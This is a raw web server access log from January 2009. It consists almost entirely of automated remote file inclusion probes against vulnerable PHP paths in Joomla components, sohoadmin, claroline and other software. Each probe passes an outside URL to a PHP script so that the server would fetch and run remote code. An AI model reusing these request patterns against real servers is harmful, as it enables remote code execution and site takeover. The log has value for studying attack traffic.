221.143.46.163 - - [04/Jan/2009:09:34:15 -0800] "GET /logs/access_080226.log//claroline/tracking/userLog.php?rootSys=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.46.163 - - [04/Jan/2009:09:34:16 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.46.163 - - [04/Jan/2009:09:34:16 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:34:24 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:34:26 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:34:44 -0800] "GET /logs/access_080330.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:34:45 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:34:45 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:34:55 -0800] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:34:55 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:34:56 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:35:05 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:35:05 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:35:11 -0800] "GET /logs/access_081115.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:35:16 -0800] "GET /logs/access_080330.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.37.54 - - [04/Jan/2009:09:35:16 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:35:16 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:35:16 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:35:28 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:09:35:32 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:09:35:32 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.27.13.94 - - [04/Jan/2009:09:35:35 -0800] "GET /blog/index.php/2008/06/05/ HTTP/1.1" 200 11032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:35:48 -0800] "GET /logs/access_080424.log%20%20/index2.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:35:51 -0800] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:35:52 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:35:52 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:36:01 -0800] "GET /logs/access_081115.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.81.169 - - [04/Jan/2009:09:36:08 -0800] "GET /logs/access_070717.log HTTP/1.0" 200 2718 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:36:23 -0800] "GET /logs/access_080530.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:36:28 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:37:00 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:37:06 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:37:10 -0800] "GET /logs/access_081212.log%20%20/index2.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:37:23 -0800] "GET /logs/access_080418.log//citywriter/head.php?path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:37:57 -0800] "GET /logs/access_080702.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:38:19 -0800] "GET /logs/access_070917.log/index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
221.143.46.163 - - [04/Jan/2009:09:38:21 -0800] "GET /logs/access_080312.log//claroline/tracking/userLog.php?rootSys=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:38:24 -0800] "GET /logs/index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:38:24 -0800] "GET /logs/access_070928.log/index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.234.200.132 - - [04/Jan/2009:09:38:25 -0800] "GET /index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 200 94866 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:38:28 -0800] "GET /logs/access_080502.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:38:30 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:38:33 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:38:43 -0800] "GET /logs/access_071222.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:38:43 -0800] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:38:43 -0800] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:38:48 -0800] "GET /logs/access_080227.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:39:10 -0800] "GET /logs/access_080912.log///calendar.php?pg=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:39:31 -0800] "GET /logs/access_080810.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:39:33 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:39:34 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.95.39.220 - - [04/Jan/2009:09:39:34 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:39:37 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:40:10 -0800] "GET /logs/access_080716.log//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:40:12 -0800] "GET /?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 94852 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:40:14 -0800] "GET /logs//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 200 80891 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:40:34 -0800] "GET /logs/access_070928.log/index.php?p=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:40:34 -0800] "GET /logs/index.php?p=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:40:35 -0800] "GET /index.php?p=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 200 94738 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:40:38 -0800] "GET /logs/access_080425.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:40:39 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:40:45 -0800] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.8.172.68 - - [04/Jan/2009:09:40:46 -0800] "GET /logs/access_081209.log//?mosConfig_absolute_path=http://conexionw.com/.../.thumb/image.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:41:23 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:41:24 -0800] "GET /logs/access_080425.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:41:25 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:41:25 -0800] "GET /logs/access_070917.log/index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:41:25 -0800] "GET /logs/index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:41:26 -0800] "GET /logs/access_070917.log/index.php?p=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:41:26 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:41:26 -0800] "GET /logs/access_080901.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:41:27 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 200 95274 "-" "Mozilla/5.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:41:27 -0800] "GET /index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 200 94866 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:09:41:30 -0800] "GET /logs/access_070928.log/index.php?p=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:41:31 -0800] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:41:48 -0800] "GET /logs/access_080425.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:42:15 -0800] "GET /errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:42:18 -0800] "GET /logs/access_080207.log/index2.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:42:28 -0800] "GET /logs/access_080714.log/index2.php?x=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:09:43:02 -0800] "GET /logs/access_081118.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:43:06 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:43:07 -0800] "GET /logs/access_080816.log/default.php?modul=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.206 - - [04/Jan/2009:09:43:11 -0800] "GET /default.php?page=http://killearnlakeshoa.org/calendar/includes/.bash/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:43:31 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:43:31 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:43:31 -0800] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:43:31 -0800] "GET /logs/access_080522.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:43:45 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:43:45 -0800] "GET /logs/access_080929.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:43:45 -0800] "GET /logs/access_080121.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:43:45 -0800] "GET /errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:43:45 -0800] "GET /logs/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:43:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:43:54 -0800] "GET /logs/access_080121.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:43:55 -0800] "GET /logs/access_080929.log/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:43:55 -0800] "GET /errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:43:56 -0800] "GET /logs/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:43:58 -0800] "GET /logs/access_080121.log/index.php?opcao=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:44:07 -0800] "GET /logs/access_080810.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:44:15 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:44:15 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:09:44:15 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:44:21 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.19 - - [04/Jan/2009:09:44:22 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www2.pensierotascabile.it/web/media/rss/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:44:28 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:44:29 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:44:29 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
